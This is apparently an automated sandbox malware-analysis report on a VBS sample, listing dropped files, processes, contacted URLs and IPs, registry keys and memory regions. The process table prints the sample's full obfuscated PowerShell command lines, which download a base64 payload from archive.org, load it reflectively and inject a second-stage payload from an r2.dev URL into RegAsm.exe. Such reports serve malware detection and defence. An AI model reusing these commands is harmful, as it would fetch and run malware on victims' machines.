Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PofaABvatI.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2z0jdzt.y3b.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imjo0fb3.tpc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivh5jr3q.ho4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1rgkfnh.2q1.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t
='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent
'+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e
= DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull,
[object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL
'+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39)
)"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
|
unknown
|
|
|
|
http://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
|
unknown
|
|
|
|
https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/mmili.txt
|
162.159.140.237
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
http://schemas.microsoft.c
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtFyL;DLjbase64Content
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
|
162.159.140.237
|
|
|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
162.159.140.237
|
pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
|
United States
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1A064DD0000
|
trusted library section
|
page read and write
|
|
|
|
1A05D8A9000
|
trusted library allocation
|
page read and write
|
|
|
|
1A05CEA9000
|
trusted library allocation
|
page read and write
|
|
|
|
150A8CF8000
|
heap
|
page read and write
|
||
|
1A05C90C000
|
trusted library allocation
|
page read and write
|
||
|
150A8BF7000
|
heap
|
page read and write
|
||
|
7FFB4B4F0000
|
trusted library allocation
|
page read and write
|
||
|
1A04C170000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
1A04C1C4000
|
heap
|
page read and write
|
||
|
254E47E000
|
stack
|
page read and write
|
||
|
1A05C8FF000
|
trusted library allocation
|
page read and write
|
||
|
4853C7E000
|
stack
|
page read and write
|
||
|
1A04D8BE000
|
trusted library allocation
|
page read and write
|
||
|
254EAFE000
|
stack
|
page read and write
|
||
|
150A8F2E000
|
heap
|
page read and write
|
||
|
7FFB4B3E0000
|
trusted library allocation
|
page read and write
|
||
|
1EBC0CD2000
|
trusted library allocation
|
page read and write
|
||
|
1EBD0BD1000
|
trusted library allocation
|
page read and write
|
||
|
150A8BBB000
|
heap
|
page read and write
|
||
|
1A04E1F7000
|
trusted library allocation
|
page read and write
|
||
|
150A8CFD000
|
heap
|
page read and write
|
||
|
7FFB4B500000
|
trusted library allocation
|
page read and write
|
||
|
150A6D31000
|
heap
|
page read and write
|
||
|
150A8F82000
|
heap
|
page read and write
|
||
|
1A04C1C6000
|
heap
|
page read and write
|
||
|
150A8FB0000
|
heap
|
page read and write
|
||
|
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
|
1A04A950000
|
heap
|
page read and write
|
||
|
150A8DAA000
|
heap
|
page read and write
|
||
|
150A8F82000
|
heap
|
page read and write
|
||
|
1EBD8E02000
|
heap
|
page read and write
|
||
|
150A8F4B000
|
heap
|
page read and write
|
||
|
1A04A7B6000
|
heap
|
page read and write
|
||
|
48543FB000
|
stack
|
page read and write
|
||
|
1A04C880000
|
heap
|
page execute and read and write
|
||
|
7FFB4B3B0000
|
trusted library allocation
|
page read and write
|
||
|
150A6C60000
|
heap
|
page read and write
|
||
|
254E67E000
|
stack
|
page read and write
|
||
|
150A8BBA000
|
heap
|
page read and write
|
||
|
150A6D2D000
|
heap
|
page read and write
|
||
|
150A8BB3000
|
heap
|
page read and write
|
||
|
1A04CE98000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B528000
|
trusted library allocation
|
page read and write
|
||
|
1EBC0C5E000
|
trusted library allocation
|
page read and write
|
||
|
1A04C7D7000
|
heap
|
page execute and read and write
|
||
|
150A8BD2000
|
heap
|
page read and write
|
||
|
1EBC0938000
|
heap
|
page read and write
|
||
|
1EBD9030000
|
heap
|
page read and write
|
||
|
7DF4E98F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A8FAB000
|
heap
|
page read and write
|
||
|
1EBBECD8000
|
heap
|
page read and write
|
||
|
1EBC09F0000
|
heap
|
page read and write
|
||
|
150A8BBC000
|
heap
|
page read and write
|
||
|
1A04CCE1000
|
trusted library allocation
|
page read and write
|
||
|
1EBC0BEB000
|
trusted library allocation
|
page read and write
|
||
|
4854076000
|
stack
|
page read and write
|
||
|
1EBC0A25000
|
heap
|
page read and write
|
||
|
485427E000
|
stack
|
page read and write
|
||
|
7FFB4B460000
|
trusted library allocation
|
page read and write
|
||
|
150A8BB5000
|
heap
|
page read and write
|
||
|
44644FA000
|
stack
|
page read and write
|
||
|
1A04CEBE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEB80000
|
heap
|
page read and write
|
||
|
150A8BB6000
|
heap
|
page read and write
|
||
|
4464BFE000
|
stack
|
page read and write
|
||
|
1EBBEEE0000
|
heap
|
page readonly
|
||
|
4464DFE000
|
stack
|
page read and write
|
||
|
1EBC0CEA000
|
trusted library allocation
|
page read and write
|
||
|
1A064945000
|
heap
|
page read and write
|
||
|
7FFB4B3F0000
|
trusted library allocation
|
page read and write
|
||
|
150A8F5F000
|
heap
|
page read and write
|
||
|
150A8BC5000
|
heap
|
page read and write
|
||
|
48539A3000
|
stack
|
page read and write
|
||
|
48541FE000
|
stack
|
page read and write
|
||
|
1A04C130000
|
heap
|
page read and write
|
||
|
7FFB4B341000
|
trusted library allocation
|
page read and write
|
||
|
1A04CC8F000
|
trusted library allocation
|
page read and write
|
||
|
1A04E59D000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEEF0000
|
trusted library allocation
|
page read and write
|
||
|
150A8BB4000
|
heap
|
page read and write
|
||
|
1EBD0BDF000
|
trusted library allocation
|
page read and write
|
||
|
1A04C1C0000
|
heap
|
page read and write
|
||
|
1A04A940000
|
heap
|
page read and write
|
||
|
1EBBEBA0000
|
heap
|
page read and write
|
||
|
1EBC0CE7000
|
trusted library allocation
|
page read and write
|
||
|
1A04C1B0000
|
trusted library allocation
|
page read and write
|
||
|
150A8F43000
|
heap
|
page read and write
|
||
|
1A04C542000
|
trusted library allocation
|
page read and write
|
||
|
150A8BB6000
|
heap
|
page read and write
|
||
|
1EBC0D28000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEF35000
|
heap
|
page read and write
|
||
|
7FFB4B410000
|
trusted library allocation
|
page read and write
|
||
|
150A8F82000
|
heap
|
page read and write
|
||
|
4853CFE000
|
stack
|
page read and write
|
||
|
4854E4D000
|
stack
|
page read and write
|
||
|
1A04CCBB000
|
trusted library allocation
|
page read and write
|
||
|
150A8BE7000
|
heap
|
page read and write
|
||
|
150A8F3C000
|
heap
|
page read and write
|
||
|
254E87B000
|
stack
|
page read and write
|
||
|
1A04E218000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B276000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A064AF3000
|
heap
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
1EBBED1B000
|
heap
|
page read and write
|
||
|
7FFB4B430000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEC50000
|
heap
|
page read and write
|
||
|
1A05CB7B000
|
trusted library allocation
|
page read and write
|
||
|
150A8F54000
|
heap
|
page read and write
|
||
|
7FFB4B250000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A906E000
|
heap
|
page read and write
|
||
|
150A8C27000
|
heap
|
page read and write
|
||
|
150A8C23000
|
heap
|
page read and write
|
||
|
1A04E598000
|
trusted library allocation
|
page read and write
|
||
|
4853F7E000
|
stack
|
page read and write
|
||
|
150A8DAA000
|
heap
|
page read and write
|
||
|
7FFB4B194000
|
trusted library allocation
|
page read and write
|
||
|
254E113000
|
stack
|
page read and write
|
||
|
485417D000
|
stack
|
page read and write
|
||
|
1A04C7D0000
|
heap
|
page execute and read and write
|
||
|
150A8EA6000
|
heap
|
page read and write
|
||
|
1EBC0930000
|
heap
|
page read and write
|
||
|
7FFB4B3F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B400000
|
trusted library allocation
|
page read and write
|
||
|
1EBC0C32000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B420000
|
trusted library allocation
|
page read and write
|
||
|
150A6D08000
|
heap
|
page read and write
|
||
|
150A8DAC000
|
heap
|
page read and write
|
||
|
1A0648EC000
|
heap
|
page read and write
|
||
|
1EBBECDC000
|
heap
|
page read and write
|
||
|
1A04E4D3000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B194000
|
trusted library allocation
|
page read and write
|
||
|
150A8C02000
|
heap
|
page read and write
|
||
|
150A8F68000
|
heap
|
page read and write
|
||
|
1A064A98000
|
heap
|
page read and write
|
||
|
1EBC0C19000
|
trusted library allocation
|
page read and write
|
||
|
150A8BB1000
|
heap
|
page read and write
|
||
|
1EBC0CCF000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEC98000
|
heap
|
page read and write
|
||
|
1EBD0C3F000
|
trusted library allocation
|
page read and write
|
||
|
254E7F7000
|
stack
|
page read and write
|
||
|
44649FF000
|
stack
|
page read and write
|
||
|
150A8F39000
|
heap
|
page read and write
|
||
|
7FFB4B330000
|
trusted library allocation
|
page read and write
|
||
|
150A8F39000
|
heap
|
page read and write
|
||
|
1A04CC93000
|
trusted library allocation
|
page read and write
|
||
|
150A8BC3000
|
heap
|
page read and write
|
||
|
150A8CF8000
|
heap
|
page read and write
|
||
|
150A8F5C000
|
heap
|
page read and write
|
||
|
150A8BF2000
|
heap
|
page read and write
|
||
|
7FFB4B4D0000
|
trusted library allocation
|
page read and write
|
||
|
150A6F40000
|
heap
|
page read and write
|
||
|
4853DFD000
|
stack
|
page read and write
|
||
|
7FFB4B250000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EBC0988000
|
heap
|
page read and write
|
||
|
254E9FE000
|
stack
|
page read and write
|
||
|
150A6D3F000
|
heap
|
page read and write
|
||
|
150A8CB9000
|
heap
|
page read and write
|
||
|
4853FF9000
|
stack
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A6DC5000
|
heap
|
page read and write
|
||
|
7FFB4B246000
|
trusted library allocation
|
page read and write
|
||
|
1EBC0A30000
|
heap
|
page read and write
|
||
|
1A04C1A0000
|
heap
|
page readonly
|
||
|
1EBC0A1D000
|
heap
|
page read and write
|
||
|
1EBBEC40000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B524000
|
trusted library allocation
|
page read and write
|
||
|
150A8F47000
|
heap
|
page read and write
|
||
|
1EBD8C40000
|
heap
|
page execute and read and write
|
||
|
1A04A776000
|
heap
|
page read and write
|
||
|
150A8EB0000
|
heap
|
page read and write
|
||
|
150A8F70000
|
heap
|
page read and write
|
||
|
150A8BB2000
|
heap
|
page read and write
|
||
|
7FFB4B332000
|
trusted library allocation
|
page read and write
|
||
|
1EBC05E0000
|
heap
|
page read and write
|
||
|
1A064ABD000
|
heap
|
page read and write
|
||
|
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B390000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3B0000
|
trusted library allocation
|
page read and write
|
||
|
150A8CED000
|
heap
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A04CC81000
|
trusted library allocation
|
page read and write
|
||
|
1A04C891000
|
trusted library allocation
|
page read and write
|
||
|
1EBD8DFA000
|
heap
|
page read and write
|
||
|
7FFB4B530000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B440000
|
trusted library allocation
|
page read and write
|
||
|
1A04C6B0000
|
heap
|
page read and write
|
||
|
150A6DDB000
|
heap
|
page read and write
|
||
|
48539EF000
|
stack
|
page read and write
|
||
|
48540F8000
|
stack
|
page read and write
|
||
|
1A04A770000
|
heap
|
page read and write
|
||
|
1EBC0BC0000
|
heap
|
page execute and read and write
|
||
|
254E8F9000
|
stack
|
page read and write
|
||
|
1A04A77A000
|
heap
|
page read and write
|
||
|
150A8BE5000
|
heap
|
page read and write
|
||
|
150A8CCD000
|
heap
|
page read and write
|
||
|
1EBD8CD7000
|
heap
|
page execute and read and write
|
||
|
1A04DFC7000
|
trusted library allocation
|
page read and write
|
||
|
150A8D0D000
|
heap
|
page read and write
|
||
|
1EBBEBE0000
|
heap
|
page read and write
|
||
|
7FFB4B420000
|
trusted library allocation
|
page read and write
|
||
|
150A8C17000
|
heap
|
page read and write
|
||
|
1EBBEC9E000
|
heap
|
page read and write
|
||
|
7FFB4B3D0000
|
trusted library allocation
|
page read and write
|
||
|
1EBBECB0000
|
heap
|
page read and write
|
||
|
1A04E252000
|
trusted library allocation
|
page read and write
|
||
|
1A05CB2A000
|
trusted library allocation
|
page read and write
|
||
|
1A04C58E000
|
heap
|
page read and write
|
||
|
7FFB4B372000
|
trusted library allocation
|
page read and write
|
||
|
150A8F48000
|
heap
|
page read and write
|
||
|
7FFB4B34A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3C0000
|
trusted library allocation
|
page read and write
|
||
|
1EBC0CD5000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B540000
|
trusted library allocation
|
page read and write
|
||
|
150A8C02000
|
heap
|
page read and write
|
||
|
1EBBEC63000
|
heap
|
page read and write
|
||
|
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B190000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEC59000
|
heap
|
page read and write
|
||
|
1EBC094B000
|
heap
|
page read and write
|
||
|
150A8F82000
|
heap
|
page read and write
|
||
|
150A8CE8000
|
heap
|
page read and write
|
||
|
1A04DFA3000
|
trusted library allocation
|
page read and write
|
||
|
1A064A90000
|
heap
|
page read and write
|
||
|
1EBC05E6000
|
heap
|
page read and write
|
||
|
150A8CF1000
|
heap
|
page read and write
|
||
|
1EBC09C0000
|
heap
|
page read and write
|
||
|
48542FE000
|
stack
|
page read and write
|
||
|
44645FE000
|
stack
|
page read and write
|
||
|
150A8C2C000
|
heap
|
page read and write
|
||
|
1A064AC1000
|
heap
|
page read and write
|
||
|
150A906E000
|
heap
|
page read and write
|
||
|
150A8BE5000
|
heap
|
page read and write
|
||
|
150A8D1D000
|
heap
|
page read and write
|
||
|
254E778000
|
stack
|
page read and write
|
||
|
44646FE000
|
stack
|
page read and write
|
||
|
254E5FE000
|
stack
|
page read and write
|
||
|
1A04A76E000
|
heap
|
page read and write
|
||
|
150A8FB1000
|
heap
|
page read and write
|
||
|
150A6D2F000
|
heap
|
page read and write
|
||
|
254EB7B000
|
stack
|
page read and write
|
||
|
7FFB4B1AB000
|
trusted library allocation
|
page read and write
|
||
|
4853EFE000
|
stack
|
page read and write
|
||
|
7FFB4B533000
|
trusted library allocation
|
page read and write
|
||
|
150A8CD8000
|
heap
|
page read and write
|
||
|
7FFB4B276000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A6FD0000
|
heap
|
page read and write
|
||
|
1EBC0F8F000
|
trusted library allocation
|
page read and write
|
||
|
1A064AA9000
|
heap
|
page read and write
|
||
|
150A8F82000
|
heap
|
page read and write
|
||
|
7FFB4B192000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4E0000
|
trusted library allocation
|
page read and write
|
||
|
150A8C1A000
|
heap
|
page read and write
|
||
|
7FFB4B193000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A04A840000
|
heap
|
page read and write
|
||
|
7FFB4B24C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EBBED19000
|
heap
|
page read and write
|
||
|
7FFB4B410000
|
trusted library allocation
|
page read and write
|
||
|
150A8DAB000
|
heap
|
page read and write
|
||
|
150A8C12000
|
heap
|
page read and write
|
||
|
1EBC1109000
|
trusted library allocation
|
page read and write
|
||
|
1A04C7E0000
|
heap
|
page execute and read and write
|
||
|
7FFB4B511000
|
trusted library allocation
|
page read and write
|
||
|
1A064894000
|
heap
|
page read and write
|
||
|
150A8CB0000
|
heap
|
page read and write
|
||
|
150A6D00000
|
heap
|
page read and write
|
||
|
1EBC0BD1000
|
trusted library allocation
|
page read and write
|
||
|
4464EFB000
|
stack
|
page read and write
|
||
|
150A8CDD000
|
heap
|
page read and write
|
||
|
1A04A774000
|
heap
|
page read and write
|
||
|
7FFB4B341000
|
trusted library allocation
|
page read and write
|
||
|
150A8BD1000
|
heap
|
page read and write
|
||
|
150A8BB2000
|
heap
|
page read and write
|
||
|
254E6FE000
|
stack
|
page read and write
|
||
|
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
|
150A8EB1000
|
heap
|
page read and write
|
||
|
1EBC10C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B380000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A0648E2000
|
heap
|
page read and write
|
||
|
485437E000
|
stack
|
page read and write
|
||
|
150A8D08000
|
heap
|
page read and write
|
||
|
150A8D28000
|
heap
|
page read and write
|
||
|
1EBD8DE0000
|
heap
|
page read and write
|
||
|
1A04C910000
|
trusted library allocation
|
page read and write
|
||
|
150A8D31000
|
heap
|
page read and write
|
||
|
254E1DE000
|
stack
|
page read and write
|
||
|
150A8F65000
|
heap
|
page read and write
|
||
|
150A8DAA000
|
heap
|
page read and write
|
||
|
7FFB4B3A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B460000
|
trusted library allocation
|
page read and write
|
||
|
44648FF000
|
stack
|
page read and write
|
||
|
150A8D2D000
|
heap
|
page read and write
|
||
|
7FFB4B4C0000
|
trusted library allocation
|
page read and write
|
||
|
1A064890000
|
heap
|
page read and write
|
||
|
7FFB4B240000
|
trusted library allocation
|
page read and write
|
||
|
1EBD8CD0000
|
heap
|
page execute and read and write
|
||
|
1A04DF91000
|
trusted library allocation
|
page read and write
|
||
|
1A04CAB3000
|
trusted library allocation
|
page read and write
|
||
|
150A6DC5000
|
heap
|
page read and write
|
||
|
7FFB4B380000
|
trusted library allocation
|
page execute and read and write
|
||
|
150A8C07000
|
heap
|
page read and write
|
||
|
1A04E1CC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B19D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EBD8DF2000
|
heap
|
page read and write
|
||
|
1A064AC8000
|
heap
|
page read and write
|
||
|
1EBBED23000
|
heap
|
page read and write
|
||
|
1A04DF9F000
|
trusted library allocation
|
page read and write
|
||
|
150A6FD5000
|
heap
|
page read and write
|
||
|
150A8BC7000
|
heap
|
page read and write
|
||
|
1EBC10CC000
|
trusted library allocation
|
page read and write
|
||
|
1EBBEAA0000
|
heap
|
page read and write
|
||
|
1EBC0A07000
|
heap
|
page read and write
|
||
|
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
|
150A8F82000
|
heap
|
page read and write
|
||
|
1A04A739000
|
heap
|
page read and write
|
||
|
1A04A7F5000
|
heap
|
page read and write
|
||
|
1EBBEC92000
|
heap
|
page read and write
|
||
|
1A05C891000
|
trusted library allocation
|
page read and write
|
||
|
150A8CB1000
|
heap
|
page read and write
|
||
|
150A8BD7000
|
heap
|
page read and write
|
||
|
254E57C000
|
stack
|
page read and write
|
||
|
7FFB4B24C000
|
trusted library allocation
|
page execute and read and write
|
||
|
254E77E000
|
stack
|
page read and write
|
||
|
150A8F60000
|
heap
|
page read and write
|
||
|
1A0648EE000
|
heap
|
page read and write
|
||
|
150A8C02000
|
heap
|
page read and write
|
||
|
1EBBEC90000
|
heap
|
page read and write
|
||
|
254E19E000
|
